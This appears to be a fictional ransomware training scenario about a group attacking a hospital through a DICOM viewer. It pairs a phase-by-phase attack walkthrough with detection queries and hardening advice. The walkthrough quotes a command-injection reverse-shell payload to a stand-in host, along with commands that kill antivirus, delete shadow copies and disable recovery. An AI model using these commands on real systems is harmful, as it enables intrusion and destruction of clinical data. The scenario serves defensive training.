Skip to content

SC-054: Medical Device Ransomware

Scenario Overview

The ransomware group "CRIMSON PULSE" targets Greenfield Memorial Hospital, a 450-bed regional healthcare facility, by exploiting a known vulnerability in an internet-facing DICOM (Digital Imaging and Communications in Medicine) web viewer. After gaining initial access, the attackers discover a flat network architecture with no segmentation between clinical workstations, medical devices, and administrative systems. They pivot through the HL7 integration engine to reach infusion pump management servers, PACS (Picture Archiving and Communication System) storage, and the hospital's EHR backup infrastructure. CRIMSON PULSE encrypts critical clinical systems, causing the hospital to divert emergency patients for 72 hours, lose centralized infusion pump management, and operate radiology on paper-based workflows for 11 days.

Environment: Greenfield Memorial Hospital network at 10.80.0.0/16; medical device VLAN at 10.80.50.0/24 (not segmented); PACS at 10.80.30.10 Initial Access: Exploited internet-facing DICOM viewer — CVE-2026-XXXX (fictional) in OpenDICOM Viewer 4.2 (T1190) Impact: 72-hour ER diversion, radiology offline 11 days, $8.5M estimated total cost Difficulty: Intermediate Sector: Healthcare

Threat Actor Profile

Attribute Details
Name CRIMSON PULSE
Type Financially motivated ransomware group
Motivation Extortion — healthcare targets pay faster due to patient safety urgency
Capability Intermediate — leverages known CVEs, commodity tooling, manual operations
Target Sector Healthcare, pharmaceuticals, long-term care facilities
Active Since 2025 (responsible for 14 known healthcare ransomware incidents)
TTPs Exploit public-facing apps, flat network traversal, targeted clinical system encryption

Attack Timeline

Timestamp (UTC) Phase Action
2026-03-05 (Day -8) Reconnaissance Shodan identifies exposed DICOM viewer at 192.0.2.80:8080
2026-03-05 22:30:00 Initial Access Exploit CVE-2026-XXXX RCE in OpenDICOM Viewer; reverse shell established
2026-03-05 22:45:00 Discovery Network enumeration reveals flat topology — no segmentation between IT and medical devices
2026-03-06 01:00:00 Lateral Movement Pivot from DICOM server (10.80.30.10) to HL7 integration engine (10.80.30.15) via SMB
2026-03-06 02:30:00 Discovery Enumerate medical device network: infusion pumps, ventilators, patient monitors at 10.80.50.0/24
2026-03-06 04:00:00 Credential Access Dump credentials from HL7 engine — service account GHOSPITAL\svc-hl7 has local admin across clinical systems
2026-03-06 06:00:00 Lateral Movement Access infusion pump management server (10.80.50.10) and PACS archive (10.80.30.20)
2026-03-06 08:00:00 Defense Evasion Disable Windows Defender and Symantec Endpoint on targeted servers
2026-03-06 10:00:00 Collection Exfiltrate 340GB of patient records and medical images for double extortion
2026-03-07 02:00:00 Impact — Pre-encryption Delete Volume Shadow Copies, disable backups, stop SQL services
2026-03-07 02:15:00 Impact — Encryption Deploy CRIMSONPULSE ransomware to PACS, infusion pump mgmt, EHR backup, radiology workstations
2026-03-07 02:30:00 Impact — Ransom Note $3.2M ransom demand with 96-hour deadline; leak site threat
2026-03-07 06:00:00 Detection Night shift nurses report infusion pump management console offline; IT confirms ransomware

Technical Analysis

Phase 1: Initial Access — DICOM Viewer Exploitation

CRIMSON PULSE exploits a remote code execution vulnerability in an unpatched internet-facing DICOM web viewer.

# Vulnerability: CVE-2026-XXXX (fictional)
# Affected: OpenDICOM Viewer 4.2.1 (DICOM web viewer)
# Type: Unauthenticated Remote Code Execution via DICOM file upload
# CVSS: 9.8 (Critical)
# Patch available: Yes (v4.2.3, released 2026-01-15 — unpatched for 49 days)

# Exploit request (reconstructed from web server access logs):
# POST /api/dicom/upload HTTP/1.1
# Host: 192.0.2.80:8080
# Content-Type: multipart/form-data; boundary=---BOUNDARY
#
# -----BOUNDARY
# Content-Disposition: form-data; name="file"; filename="study.dcm"
# Content-Type: application/dicom
#
# [Crafted DICOM file with embedded command injection in Patient Name field]
# (0010,0010) PN: "; /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.55/4443 0>&1' #"
#
# Result: Reverse shell established to attacker C2 at 203.0.113.55:4443

# Server context:
# User: www-data (DICOM viewer runs as unprivileged user)
# Host: dicom-viewer01 (10.80.30.10)
# OS: Ubuntu 22.04 LTS
# Network: No firewall between DICOM server and internal medical network

Phase 2: Network Discovery — Flat Medical Device Network

The attacker discovers the hospital has no network segmentation between IT systems and medical devices.

# Network enumeration from compromised DICOM server (10.80.30.10)
# Reconstructed from forensic analysis of bash history and network logs

# ARP scan reveals flat network:
# arp-scan 10.80.0.0/16
# 10.80.10.1    — Default gateway
# 10.80.10.10   — AD domain controller (ghospital.example.com)
# 10.80.20.10   — EHR application server
# 10.80.20.20   — EHR database server
# 10.80.30.10   — DICOM viewer (compromised host)
# 10.80.30.15   — HL7 integration engine (Mirth Connect)
# 10.80.30.20   — PACS archive server (2.4 TB medical images)
# 10.80.30.25   — Radiology workstation 1
# 10.80.30.26   — Radiology workstation 2
# 10.80.50.10   — Infusion pump management server (BD Alaris)
# 10.80.50.11   — Patient monitor central station
# 10.80.50.12   — Ventilator management gateway
# 10.80.50.20-80 — Individual infusion pumps (60 devices)
# 10.80.60.10   — Pharmacy dispensing cabinet controller

# Critical finding: ALL devices on same broadcast domain
# No VLANs, no ACLs, no micro-segmentation
# Medical devices directly accessible from any host on 10.80.0.0/16

Phase 3: Lateral Movement via HL7 Integration Engine

The attacker pivots through the HL7 integration engine which has broad access to clinical systems.

# HL7 integration engine (Mirth Connect) at 10.80.30.15
# The HL7 engine bridges clinical systems — has credentials for most endpoints

# Attacker accesses Mirth Connect admin console (default credentials):
# URL: http://10.80.30.15:8443/
# Username: admin
# Password: admin  (default — never changed)

# Mirth Connect channel list reveals integration credentials:
# Channel: ADT-to-EHR
#   Destination: 10.80.20.10:2575 (HL7v2 MLLP)
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED
#
# Channel: Orders-to-Pharmacy
#   Destination: 10.80.60.10:8080
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED
#
# Channel: Results-to-PACS
#   Destination: 10.80.30.20:104 (DICOM C-STORE)
#   Credentials: GHOSPITAL\svc-hl7 / REDACTED

# svc-hl7 service account has local admin on all clinical servers
# — needed for HL7 message routing and integration
# Attacker uses these credentials for lateral movement

Phase 4: Medical Device Network Access

The attacker accesses the infusion pump management server and PACS archive.

# Lateral movement to infusion pump management server (10.80.50.10)
# Using svc-hl7 credentials via SMB

# net use \\10.80.50.10\C$ /user:GHOSPITAL\svc-hl7 REDACTED
# Command completed successfully.

# Infusion pump management server (BD Alaris System Manager):
# OS: Windows Server 2016 (EOL — no longer receiving security updates)
# Role: Central management for 60 infusion pumps
# Services:
#   - BD Alaris System Manager (port 443)
#   - Drug library distribution service (port 8080)
#   - Pump firmware update service (port 9090)

# Impact if encrypted:
# - Pumps continue running on last programmed settings
# - No central monitoring of infusion rates
# - No drug library updates
# - Manual programming required for new infusions
# - Significant patient safety risk

# PACS archive access (10.80.30.20):
# net use \\10.80.30.20\PACSArchive$ /user:GHOSPITAL\svc-hl7 REDACTED
# Archive contains 2.4TB of medical images (CT, MRI, X-ray, ultrasound)
# 147,000 patient studies spanning 8 years

Phase 5: Ransomware Deployment

CRIMSON PULSE deploys ransomware targeting clinical systems while avoiding medical devices directly.

# Pre-encryption preparation (reconstructed from forensic timeline)
# Executed on each target server via remote PsExec

# 1. Disable security software
# taskkill /F /IM "ccSvcHst.exe"   # Symantec Endpoint Protection
# taskkill /F /IM "MsMpEng.exe"    # Windows Defender
# sc config WinDefend start= disabled

# 2. Delete shadow copies and disable recovery
# vssadmin delete shadows /all /quiet
# wbadmin delete catalog -quiet
# bcdedit /set {default} recoveryenabled No

# 3. Stop critical services before encryption
# net stop MSSQLSERVER  # EHR database
# net stop "BD Alaris System Manager"
# net stop "PACS Archive Service"
# net stop wbengine  # Windows Backup

# 4. Deploy CRIMSONPULSE ransomware
# Encrypted targets:
#   10.80.50.10 — Infusion pump management (BD Alaris)
#   10.80.30.20 — PACS archive (2.4TB medical images)
#   10.80.30.25-26 — Radiology workstations
#   10.80.20.20 — EHR backup database
#   10.80.30.15 — HL7 integration engine

# File extensions targeted:
# .dcm .hl7 .mdb .bak .sql .pdf .dicom .jpg .nii .nrrd

# Ransom note: CRIMSONPULSE_RECOVERY.txt
# "GREENFIELD MEMORIAL HOSPITAL
#  Your clinical systems have been encrypted by CRIMSON PULSE.
#  We have also downloaded 340GB of patient records.
#  Payment: 48 BTC ($3,200,000) within 96 hours
#  Failure to pay: patient records published on our leak site
#  Contact: crimsonpulse@securemail.example.com"

Detection Opportunities

KQL — Unusual DICOM Traffic Patterns

// Detect exploitation attempts against DICOM services
CommonSecurityLog
| where TimeGenerated > ago(7d)
| where DestinationPort in (104, 8080, 11112)  // DICOM ports
| where SourceIP !startswith "10."  // External sources
| summarize
    ConnectionCount = count(),
    UniquePayloads = dcount(RequestURL),
    DataVolume = sum(SentBytes)
    by SourceIP, DestinationIP, DestinationPort
| where ConnectionCount > 10
| sort by ConnectionCount desc

KQL — Medical Device Network Anomalous Access

// Detect IT systems accessing medical device management infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP startswith "10.80.50."  // Medical device subnet
| where LocalIP !startswith "10.80.50."  // Access from outside medical device network
| where RemotePort in (443, 445, 3389, 8080, 9090)
| summarize
    Connections = count(),
    UniquePorts = dcount(RemotePort),
    Ports = make_set(RemotePort)
    by DeviceName, LocalIP, RemoteIP, bin(TimeGenerated, 1h)
| where Connections > 5
| sort by Connections desc

KQL — HL7 Integration Engine Credential Abuse

// Detect service account usage outside normal HL7 integration patterns
SecurityEvent
| where TimeGenerated > ago(7d)
| where EventID in (4624, 4625)  // Logon events
| where TargetUserName == "svc-hl7"
| where LogonType in (3, 10)  // Network and RemoteInteractive
| where Computer !in ("HL7-ENGINE01", "EHR-APP01", "PACS-SRV01")  // Expected targets
| summarize
    LogonCount = count(),
    UniqueTargets = dcount(Computer),
    Targets = make_set(Computer)
    by IpAddress, bin(TimeGenerated, 1h)
| where UniqueTargets > 2
| sort by LogonCount desc

SPL — DICOM Exploitation Detection

index=network sourcetype="firewall"
  dest_port IN (104, 8080, 11112)
  NOT src_ip="10.*"
| stats count as connections
        dc(src_ip) as unique_sources
        sum(bytes_out) as total_bytes
        values(src_ip) as source_ips
        by dest_ip dest_port
| where connections > 20
| where total_bytes > 1000000
| sort -connections

SPL — Service Account Lateral Movement

index=wineventlog sourcetype="WinEventLog:Security"
  EventCode=4624 LogonType=3
  TargetUserName="svc-hl7"
| stats count as logons
        dc(Computer) as unique_hosts
        values(Computer) as target_hosts
        by IpAddress
| where unique_hosts > 3
| lookup approved_hl7_targets host AS target_hosts OUTPUT approved
| where NOT approved="true"
| sort -logons

SPL — Medical Device Network Encryption Activity

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=11
  Computer IN ("INFUSION-MGMT01", "PACS-SRV01", "RAD-WS01", "RAD-WS02")
| rex field=TargetFilename "\.(?<extension>[^.]+)$"
| where extension IN ("crimsonpulse", "locked", "encrypted", "enc")
| stats count as encrypted_files
        dc(Computer) as affected_hosts
        values(Computer) as host_list
        min(_time) as first_seen
        max(_time) as last_seen
        by Image
| where encrypted_files > 20
| sort -encrypted_files

SPL — Volume Shadow Copy Deletion on Clinical Systems

index=endpoint sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational"
  EventCode=1
  (CommandLine="*vssadmin*delete*shadows*" OR
   CommandLine="*wbadmin*delete*catalog*" OR
   CommandLine="*bcdedit*recoveryenabled*No*")
  Computer IN ("INFUSION-MGMT01", "PACS-SRV01", "EHR-BACKUP01")
| stats count by Computer User CommandLine ParentImage _time
| sort _time

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Scenario Phase
Initial Access T1190 Exploit Public-Facing Application DICOM viewer RCE exploitation
Discovery T1046 Network Service Scanning Flat network enumeration
Credential Access T1552.001 Unsecured Credentials: Credentials in Files HL7 engine stored credentials
Lateral Movement T1021.002 Remote Services: SMB/Windows Admin Shares SMB pivot to clinical servers
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools Disabled Symantec and Defender
Collection T1039 Data from Network Shared Drive Patient records exfiltration
Impact T1486 Data Encrypted for Impact CRIMSONPULSE ransomware encryption
Impact T1489 Service Stop Stopped SQL, PACS, Alaris services
Impact T1490 Inhibit System Recovery Shadow copy and backup deletion

Impact Assessment

Impact Category Assessment
Patient Safety Critical — infusion pumps lost central monitoring; manual programming required
Clinical Operations ER diversion for 72 hours; radiology paper-based for 11 days
Financial $8.5M total (ransom not paid; recovery + regulatory + legal)
Regulatory HIPAA breach notification for 147,000 patients; HHS/OCR investigation
Reputational Loss of community trust; patient volume decline for 6+ months
Medical Records 2.4TB of medical imaging data inaccessible for 11 days

Remediation & Hardening

Immediate Actions

  1. Activate clinical downtime procedures — switch to paper-based workflows for all affected departments
  2. Isolate compromised systems — network-disconnect PACS, infusion pump management, HL7 engine
  3. Verify infusion pump safety — clinical engineering confirms all pumps operating on local settings
  4. Block attacker infrastructure — 203.0.113.55 at perimeter firewall
  5. Preserve forensic evidence — disk images and memory captures of all encrypted servers
  6. Activate patient diversion protocols — coordinate with regional hospitals for ER overflow

Long-Term Hardening

  1. Network segmentation — isolate medical devices into dedicated VLANs with strict ACLs (IEC 80001-1 compliant)
  2. Patch management for medical devices — establish FDA-coordinated vulnerability disclosure response process
  3. Remove DICOM viewer from internet — place behind VPN with MFA for external radiologist access
  4. Harden HL7 integration engine — change default credentials, implement least-privilege service accounts
  5. Deploy medical device monitoring — passive network monitoring for anomalous clinical protocol traffic
  6. Immutable backups — air-gapped backup solution for PACS, EHR, and clinical databases
  7. Tabletop exercises — quarterly ransomware tabletop exercises including clinical downtime procedures

Discussion Questions

  1. How should hospitals balance the need for medical device interoperability with network segmentation requirements?
  2. What are the ethical considerations of ransomware groups explicitly targeting healthcare organizations?
  3. How can legacy medical devices (running EOL operating systems) be protected when vendor patches are unavailable?
  4. What role should the FDA play in mandating cybersecurity standards for connected medical devices?
  5. How should a hospital CISO prioritize patient safety vs. forensic evidence preservation during an active ransomware incident?
  6. What minimum viable network segmentation would have prevented lateral movement from the DICOM server to infusion pump management?

Cross-References